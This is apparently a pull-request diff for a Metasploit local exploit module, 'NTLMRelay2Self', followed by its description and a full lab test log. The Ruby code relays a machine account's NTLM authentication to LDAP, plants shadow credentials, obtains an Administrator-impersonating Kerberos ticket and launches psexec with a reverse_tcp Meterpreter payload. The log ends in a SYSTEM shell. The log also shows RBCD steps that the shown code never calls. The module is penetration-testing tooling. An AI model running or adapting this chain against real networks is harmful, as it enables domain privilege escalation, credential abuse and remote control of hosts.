+  end
+
+  def on_relay_success(relay_connection:, relay_identity:)
+    @relay_succeeded = true
+    print_good('Relay succeeded! Handshake completed.')
+
+    ldap_session = session_setup(relay_connection, relay_identity)
+    return unless ldap_session
+
+    return unless validate_options!
+
+    dc_ip = relay_connection.socket.peerhost
+    target_name = default_machine_account
+
+    framework.threads.spawn("Post_Relay_Chain_#{ldap_session.sid}", false) do
+      run_post_relay_chain(ldap_session, dc_ip, target_name)
+    end
+  rescue StandardError => e
+    elog('Failed to setup the session or orchestrate post-relay actions', error: e)
+    print_error("Relay success handling failed: #{e.message}")
+  end
+
+  def run_post_relay_chain(ldap_session, dc_ip, target_name)
+    if datastore['RUN_GET_TICKET']
+      run_get_ticket_chain(ldap_session, dc_ip, target_name)
+    end
+
+    if datastore['RUN_PSEXEC']
+      run_psexec_step(ldap_session, dc_ip, target_name)
+    end
+  end
+
+  def run_get_ticket_chain(ldap_session, dc_ip, target_name)
+    added_device_id = nil
+
+    begin
+      domain_fqdn = resolve_domain
+      return unless domain_fqdn
+
+      fqdn = target_fqdn(target_name, domain_fqdn)
+
+      shadow_results = call_shadow_credentials_module('ADD', ldap_session.sid, target_name)
+      return unless shadow_results
+
+      added_device_id = shadow_results[:device_id]
+      cert_path = shadow_results[:cert_path]
+
+      ccache_path = call_get_ticket_module('GET_TGS', cert_path, dc_ip, domain_fqdn, target_name, fqdn: fqdn)
+      return unless ccache_path
+
+      print_good("Obtained impersonating ST for target host #{target_name}")
+
+      store_or_export_ticket(ccache_path, target_name)
+    rescue StandardError => e
+      print_error("Error during ticket acquisition chain: #{e.message}")
+    ensure
+      print_status('--- Initiating OPSEC Cleanup ---')
+
+      if added_device_id
+        print_status("Removing Shadow Credentials (Device ID: #{added_device_id})...")
+        call_shadow_credentials_module('REMOVE', ldap_session.sid, target_name, added_device_id)
+      end
+
+      print_status('Cleanup complete.')
+    end
+  end
+
+  def run_psexec_step(_ldap_session, _dc_ip, target_name)
+    unless datastore['RUN_GET_TICKET']
+      print_warning('RUN_PSEXEC set without RUN_GET_TICKET; expecting a previously obtained ticket.')
+    end
+
+    domain_fqdn = resolve_domain
+    return unless domain_fqdn
+
+    fqdn = target_fqdn(target_name, domain_fqdn)
+
+    ccache_path = find_latest_ticket(target_name, domain_fqdn)
+    unless ccache_path
+      print_error("No cached ticket found for #{target_name}. Run with RUN_GET_TICKET first.")
+      return
+    end
+
+    execute_psexec(ccache_path, fqdn, domain_fqdn)
+  end
+
+  def store_or_export_ticket(ccache_path, target_name)
+    @last_ccache_path = ccache_path
+    print_status("Ticket for #{target_name} stored at: #{ccache_path}")
+  end
+
+  def find_latest_ticket(target_name, domain_fqdn)
+    return @last_ccache_path if @last_ccache_path && File.exist?(@last_ccache_path)
+
+    fqdn = target_fqdn(target_name, domain_fqdn)
+    ticket_loot = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").where('info LIKE ?', "%#{fqdn}%").last
+    return ticket_loot.path if ticket_loot && File.exist?(ticket_loot.path)
+
+    nil
+  end
+
+  def call_shadow_credentials_module(action, ldap_session_id, target_name, device_id = nil)
+    mod_refname = 'admin/ldap/shadow_credentials'
+    print_status("Loading #{mod_refname} to execute against LDAP Session #{ldap_session_id}")
+
+    shadow_module = framework.modules.create(mod_refname)
+
+    unless shadow_module
+      print_error("Failed to load module: #{mod_refname}")
+      return nil
+    end
+
+    shadow_module.datastore['SESSION'] = ldap_session_id
+    shadow_module.datastore['ACTION'] = action
+    shadow_module.datastore['TARGET_USER'] = target_name
+    shadow_module.datastore['DEVICE_ID'] = device_id if action == 'REMOVE' && device_id
+    shadow_module.datastore['VERBOSE'] = datastore['VERBOSE']
+
+    print_status("Running #{mod_refname} to #{action} key for #{target_name}...")
+
+    results = shadow_module.run_simple(
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => false
+    )
+
+    if action == 'ADD'
+      if results && results.is_a?(Array) && results.length >= 2
+        returned_device_id, stored_path = results
+        print_status("Shadow Credentials successfully added (Device ID: #{returned_device_id}).")
+        return { device_id: returned_device_id, cert_path: stored_path }
+      end
+    elsif action == 'REMOVE'
+      if results
+        print_good("Successfully removed KeyCredentialLink with Device ID: #{device_id}")
+        return { success: true }
+      end
+    end
+
+    print_error("Shadow credentials module failed or did not return expected data for action #{action}.")
+    nil
+  end
+
+  # Obtains a Kerberos ticket via the get_ticket module.
+  # action: 'GET_TGT' (user targets) or 'GET_TGS' (computer targets with S4U2Proxy impersonation).
+  def call_get_ticket_module(action, cert_path, dc_ip, domain_fqdn, target_name, fqdn: nil)
+    is_tgs = action == 'GET_TGS'
+    print_status(is_tgs ? 'Requesting S4U2Proxy TGS for Administrator...' : "Requesting TGT for user #{target_name} via PKINIT...")
+
+    get_ticket_mod = framework.modules.create('auxiliary/admin/kerberos/get_ticket')
+    initial_loot_id = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").maximum(:id) || 0
+
+    get_ticket_mod.datastore['ACTION'] = action
+    get_ticket_mod.datastore['CERT_FILE'] = cert_path
+    get_ticket_mod.datastore['DOMAIN'] = domain_fqdn
+    get_ticket_mod.datastore['RHOSTS'] = dc_ip
+    get_ticket_mod.datastore['USERNAME'] = target_name
+
+    if is_tgs
+      get_ticket_mod.datastore['IMPERSONATE'] = datastore['TARGET_PRIVILEGED_USER'].to_s.empty? ? 'Administrator' : datastore['TARGET_PRIVILEGED_USER']
+      get_ticket_mod.datastore['IMPERSONATE_TYPE'] = 'generic'
+      get_ticket_mod.datastore['SPN'] = datastore['SPN'].to_s.empty? ? "CIFS/#{fqdn}" : datastore['SPN']
+    end
+
+    vprint_status('Datastore values being sent to get_ticket:')
+    vprint_status("ACTION: #{get_ticket_mod.datastore['ACTION']}")
+    vprint_status("CERT_FILE: #{get_ticket_mod.datastore['CERT_FILE']}")
+    vprint_status("DOMAIN: #{get_ticket_mod.datastore['DOMAIN']}")
+    vprint_status("RHOSTS: #{get_ticket_mod.datastore['RHOSTS']}")
+    vprint_status("USERNAME: #{get_ticket_mod.datastore['USERNAME']}")
+    vprint_status("IMPERSONATE: #{get_ticket_mod.datastore['IMPERSONATE']}")
+    vprint_status("IMPERSONATE_TYPE: #{get_ticket_mod.datastore['IMPERSONATE_TYPE']}")
+    vprint_status("SPN: #{get_ticket_mod.datastore['SPN']}")
+
+    begin
+      get_ticket_mod.run_simple('LocalInput' => user_input, 'LocalOutput' => user_output)
+    rescue StandardError => e
+      print_error("Getting the #{is_tgs ? 'TGS' : 'TGT'} has failed: #{e.message}.")
+      return nil
+    end
+
+    ticket_loot = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").where('id > ?', initial_loot_id).last
+
+    unless ticket_loot && File.exist?(ticket_loot.path)
+      print_error("Failed to retrieve #{is_tgs ? 'TGS' : 'TGT'} from database.")
+      return nil
+    end
+
+    print_good("#{is_tgs ? 'S4U2Proxy Ticket' : 'TGT'} acquired: #{ticket_loot.path}")
+    ticket_loot.path
+  end
+
+  def execute_psexec(ccache_path, fqdn, domain_fqdn)
+    print_status("Executing PsExec with Kerberos ticket via session #{session.sid} COMM channel...")
+
+    psexec_mod = framework.modules.create('exploit/windows/smb/psexec')
+    unless psexec_mod
+      print_error('Failed to load module: exploit/windows/smb/psexec')
+      return
+    end
+
+    psexec_mod.datastore['RHOSTS'] = fqdn
+    psexec_mod.datastore['SMBUser'] = 'Administrator'
+    psexec_mod.datastore['SMBDomain'] = domain_fqdn
+    psexec_mod.datastore['SMB::Auth'] = 'kerberos'
+    psexec_mod.datastore['Smb::Krb5Ccname'] = ccache_path
+    psexec_mod.datastore['Smb::Rhostname'] = fqdn
+    psexec_mod.datastore['SMB::Comm'] = session.sid
+    psexec_mod.datastore['PAYLOAD'] = payload_instance.refname
+    psexec_mod.datastore['LHOST'] = datastore['LHOST'] if datastore['LHOST']
+    psexec_mod.datastore['LPORT'] = datastore['LPORT'] if datastore['LPORT']
+
+    print_status("Launching PsExec against #{fqdn} as Administrator (Kerberos) via COMM session #{session.sid}...")
+
+    psexec_mod.exploit_simple(
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => true
+    )
+
+    print_good('PsExec module launched. Check sessions for new elevated session.')
+  end
+
+  def session_setup(relay_connection, relay_identity)
+    client = relay_connection.create_ldap_client
+    ldap_session = Msf::Sessions::LDAP.new(
+      relay_connection.socket,
+      {
+        client: client,
+        keepalive_seconds: datastore['SessionKeepalive']
+      }
+    )
+    domain, _, username = relay_identity.partition('\\')
+
+    ldap_session.set_from_exploit(self)
+    ldap_session.info = "#{domain}\\#{username}"
+    framework.sessions.register(ldap_session)
+
+    if ldap_session.sid
+      print_good("LDAP Session #{ldap_session.sid} successfully opened!")
+      @spawned_ldap_sessions << ldap_session.sid
+      ldap_session
+    else
+      print_error('Failed to register the LDAP session.')
+      nil
+    end
+  end
+
+  def pre_flight_checks
+    check_db_status
+    check_options
+    check_lm_compatibility_level
+    check_privs
+    check_port_availability
+    check_target_reachability
+  end
+
+  def check_db_status
+    unless framework.db.active
+      fail_with(Failure::BadConfig, 'A connected Metasploit database is required to track Kerberos tickets. Please start the database using `db_connect`.')
+    end
+  end
+
+  def check_options
+    unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)
+      fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')
+    end
+  end
+
+  def check_lm_compatibility_level
+    lm_level = lm_compatibility_level
+
+    if lm_level > 2
+      fail_with(Failure::BadConfig, 'The target system is configured to not send NTLMv1 responses. This module requires NTLMv1 to be enabled to capture relay credentials. Please set the LmCompatibilityLevel registry value to 2 or lower and try again.')
+    end
+
+    print_good("Target system LmCompatibilityLevel is set to #{lm_level}, which allows NTLMv1 responses. Proceeding with module execution.")
+  end
+
+  def check_privs
+    srvport = datastore['SRVPORT'].to_i
+
+    if srvport <= 1024 && !is_admin?
+      print_warning("You are attempting to bind to a privileged port (#{srvport}) but do not have Admin rights.")
+      print_warning('The OS will likely block this. Consider changing SRVPORT to something > 1024, or escalating privileges.')
+    end
+  end
+
+  # Verifies the session token has the LOCAL SID (S-1-2-0). The ETW service trigger
+  # for WebClient requires this SID. Present for interactive/RDP logons, absent for
+  # network (type 3) logons such as psexec or WMI-spawned sessions.
+  def check_local_sid
+    # S-1-2-0 binary SID: Revision=1, SubAuthorityCount=1,
+    # IdentifierAuthority={0,0,0,0,0,2}, SubAuthority[0]=0
+    local_sid = "\x01\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
+
+    result = session.railgun.advapi32.CheckTokenMembership(0, local_sid, 4)
+    is_member = result['IsMember'].unpack1('V')
+
+    unless is_member != 0
+      fail_with(Failure::BadConfig,
+                'Session token does not have the LOCAL SID (S-1-2-0). ' \
+                'The ETW trigger requires an interactive or RDP logon. ' \
+                'Network logon sessions (e.g., psexec/WMI) will not work.')
+    end
+    print_good('Session token has LOCAL SID (S-1-2-0) — ETW service trigger will work.')
+  end
+
+  def check_port_availability
+    srvport = datastore['SRVPORT'].to_i
+    print_status("Checking if port #{srvport} is available on the victim...")
+
+    begin
+      connections = session.net.config.get_netstat
+      conflict = connections.find do |conn|
+        conn.local_port == srvport &&
+          conn.protocol == 'tcp' &&
+          conn.state == 'LISTEN'
+      end
+
+      if conflict
+        pid_info = conflict.pid_name.to_s.empty? ? conflict.pid : conflict.pid_name
+        fail_with(Failure::BadConfig, "Port #{srvport} is already in use by PID #{pid_info} on the victim machine! Please choose a different SRVPORT.")
+      else
+        print_good("Port #{srvport} is available on the victim machine.")
+      end
+    rescue NoMethodError, Rex::Post::Meterpreter::RequestError => e
+      print_warning("Could not verify port availability (Error: #{e.message}). Proceeding anyway...")
+    end
+  end
+
+  def check_target_reachability
+    rhosts_string = datastore['RHOSTS']
+    rport = datastore['RPORT'].to_i
+
+    print_status("Verifying victim can reach the target LDAP server(s) on port #{rport}...")
+
+    Rex::Socket::RangeWalker.new(rhosts_string).each do |rhost|
+      sock = session.net.socket.create(
+        Rex::Socket::Parameters.new(
+          'PeerHost' => rhost,
+          'PeerPort' => rport,
+          'Proto' => 'tcp'
+        )
+      )
+      sock.close
+      print_good("Target LDAP server #{rhost} is reachable from the victim!")
+    rescue StandardError => e
+      print_warning("Could not reach #{rhost}:#{rport} from the victim machine (Error: #{e.message}).")
+      print_warning("The relay will likely fail for #{rhost} if the victim cannot communicate with it.")
+    end
+  end
+end


### PR DESCRIPTION
## NTLMRelay2Self — HTTP → LDAP Relay Module

This adds a module that exploits the **NTLMRelay2Self** attack. It requires a low-privilege user session on a Windows host.

With a low privilege session on the domain joined victim host the module does the following:
- Starts an HTTP to LDAP relay server
- Starts the WebClient Service on the local machine via railgun 
- Coerces authentication to the relay server as the local machine account using petitpotam also via railgun 
- With the resulting LDAP session shadow credentials are added for the local machine account
- If `RUN_GET_TICKET` is set a TGS impersonating the local Admin is obtained using the Shadow creds added
- If `RUN_PSEXEC` is set to `true`, the module then uses that TGS with the psexec module to obtain a session running as `NT AUTHORITY\SYSTEM`.


## PSEXEC Comm Update

This PR also makes a minor update to the psexec module so it accepts a `Comm` datastore option, allowing it to run through a specific session. This is what we want in this scenario: psexec should run from the low-privilege session on the compromised host, not from the workstation the operator is running msfconsole on.

## Testing Computer Target — Full LPE Chain
Obtain an elevated SYSTEM session on the compromised host by targeting its own machine account:
```
msf exploit(windows/local/ntlm_relay_2_self) > dns add-static jackws.whistler.local 10.5.134.194
[*] Added static hostname mapping jackws.whistler.local to 10.5.134.194
msf > use exploit/windows/local/ntlm_relay_2_self
msf exploit(windows/local/ntlm_relay_2_self) > set SESSION 1
msf exploit(windows/local/ntlm_relay_2_self) > set RHOSTS 10.5.134.192
msf exploit(windows/local/ntlm_relay_2_self) > set DOMAIN whistler.local
msf exploit(windows/local/ntlm_relay_2_self) > set RUN_GET_TICKET true
msf exploit(windows/local/ntlm_relay_2_self) > set RUN_PSEXEC true
msf exploit(windows/local/ntlm_relay_2_self) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(windows/local/ntlm_relay_2_self) > set LHOST 192.168.3.8
msf exploit(windows/local/ntlm_relay_2_self) > run
[*] Exploit running as background job 3.
msf exploit(windows/local/ntlm_relay_2_self) >
[+] Target system LmCompatibilityLevel is set to 2, which allows NTLMv1 responses. Proceeding with module execution.
[*] Checking if port 8081 is available on the victim...
[+] Port 8081 is available on the victim machine.
[*] Verifying victim can reach the target LDAP server(s) on port 389...
[+] Target LDAP server 10.5.134.192 is reachable from the victim!
[*] Starting relay server bound to Session 1...
[*] Using URL: http://192.168.3.8:8081/W8rNgM
[*] Server successfully started on 0.0.0.0:8081 via Session 1.
[*] Triggering the relay by making an HTTP request to the local listener via Invoke-WebRequest...
[+] Compressed size: 1172
[*] Received GET request for /test from 127.0.0.1:55822
[*] Processing request in state unauthenticated from 127.0.0.1
[*] Received GET request for /test from 127.0.0.1:55823
[*] Processing request in state unauthenticated from 127.0.0.1
[*] Received Type 1 message from 127.0.0.1, attempting to relay...
[*] Attempting to relay to 10.5.134.192:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://10.5.134.192:389, attempting to relay back to client
[*] Received GET request for /test from 127.0.0.1:55823
[*] Processing request in state awaiting_type3 from 127.0.0.1
[*] Received Type 3 message from 127.0.0.1, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: WHISTLER\sandy -  Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded! Handshake completed.
[+] LDAP Session 4 successfully opened!
[*] Target list exhausted for 127.0.0.1. Closing connection.
[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 4
[*] Running admin/ldap/shadow_credentials to ADD key for jackws$...
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 10.5.134.192:389 Discovered base DN: DC=whistler,DC=local
[*] Certificate stored at: /Users/jheysel/.msf4/loot/20260526112237_default_unknown_windows.ad.cs_549539.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID b9a02d63-266a-0da2-618d-f1d0f349f194
[*] Shadow Credentials successfully added (Device ID: b9a02d63-266a-0da2-618d-f1d0f349f194).
[*] Loading admin/ldap/rbcd to execute against LDAP Session 4
[*] Running admin/ldap/rbcd with action WRITE for jackws$ self-delegation...
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[+] Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Requesting S4U2Proxy TGS for Administrator...
[!] Warning: Provided principal and realm (jackws$@whistler.local) do not match entries in certificate:
[*] Using cached credential for krbtgt/WHISTLER.LOCAL@WHISTLER.LOCAL JACKWS$@WHISTLER.LOCAL
[*] 10.5.134.192:88 - Getting TGS impersonating Administrator@whistler.local (SPN: CIFS/jackws.whistler.local)
[+] 10.5.134.192:88 - Received a valid TGS-Response
[*] 10.5.134.192:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260526112238_default_10.5.134.192_mit.kerberos.cca_733820.bin
[+] 10.5.134.192:88 - Received a valid TGS-Response
[*] 10.5.134.192:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260526112239_default_10.5.134.192_mit.kerberos.cca_087289.bin
[+] S4U2Proxy Ticket acquired: /Users/jheysel/.msf4/loot/20260526112239_default_10.5.134.192_mit.kerberos.cca_087289.bin
[+] Obtained impersonating ST for target host jackws$
[*] Ticket for jackws$ stored at: /Users/jheysel/.msf4/loot/20260526112239_default_10.5.134.192_mit.kerberos.cca_087289.bin
[*] --- Initiating OPSEC Cleanup ---
[*] Reverting RBCD self-delegation rule for jackws$...
[*] Loading admin/ldap/rbcd to execute against LDAP Session 4
[*] Running admin/ldap/rbcd with action REMOVE for jackws$ self-delegation...
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] No DACL ACEs matched. No changes are necessary.
[*] Removing Shadow Credentials (Device ID: b9a02d63-266a-0da2-618d-f1d0f349f194)...
[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 4
[*] Running admin/ldap/shadow_credentials to REMOVE key for jackws$...
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 10.5.134.192:389 Discovered base DN: DC=whistler,DC=local
[+] Deleted entry with device ID b9a02d63-266a-0da2-618d-f1d0f349f194
[+] Successfully removed KeyCredentialLink with Device ID: b9a02d63-266a-0da2-618d-f1d0f349f194
[*] Cleanup complete.
[*] Executing PsExec with Kerberos ticket via session 1 COMM channel...
[*] Launching PsExec against jackws.whistler.local as Administrator (Kerberos) via COMM session 1...
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] PsExec module launched. Check sessions for new elevated session.
[*] Started reverse TCP handler on 192.168.3.8:4444
[*] Sending stage (196678 bytes) to 10.5.134.194
[*] jackws.whistler.local:445 - Connecting to the server...
[*] jackws.whistler.local:445 - Authenticating to jackws.whistler.local:445|whistler.local as user 'Administrator'...
[*] jackws.whistler.local:445 - Patching sname from CIFS/jackws.whistler.local to cifs/jackws.whistler.local
[*] jackws.whistler.local:445 - Loaded a credential from ticket file: /Users/jheysel/.msf4/loot/20260526112239_default_10.5.134.192_mit.kerberos.cca_087289.bin
msf exploit(windows/local/ntlm_relay_2_self) > [*] Meterpreter session 5 opened (192.168.3.8:4444 -> 10.5.134.194:55715) at 2026-05-26 11:25:29 -0700

msf exploit(windows/local/ntlm_relay_2_self) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JACKWS
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WHISTLER
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter >
```

## Test Environment Notes
The Domain Controller is a Windows 2019 running a Windows2016Forest level
Patch info of the DC:
```
OS Version:                10.0.17763 N/A Build 17763
Hotfix(s):                 6 Hotfix(s) Installed.
                           [01]: KB5066143
                           [02]: KB4577586
                           [03]: KB4589208
                           [04]: KB5065428
                           [05]: KB5032306
                           [06]: KB5065765
```
The compromised Domain Joined host is Windows 10 as NTLMv1 has been completed disabled on Windows 11 mitigating this attack. 

See the respective documentation pages to see the environment requirements for shadow creds / rbcd / psexec. 
  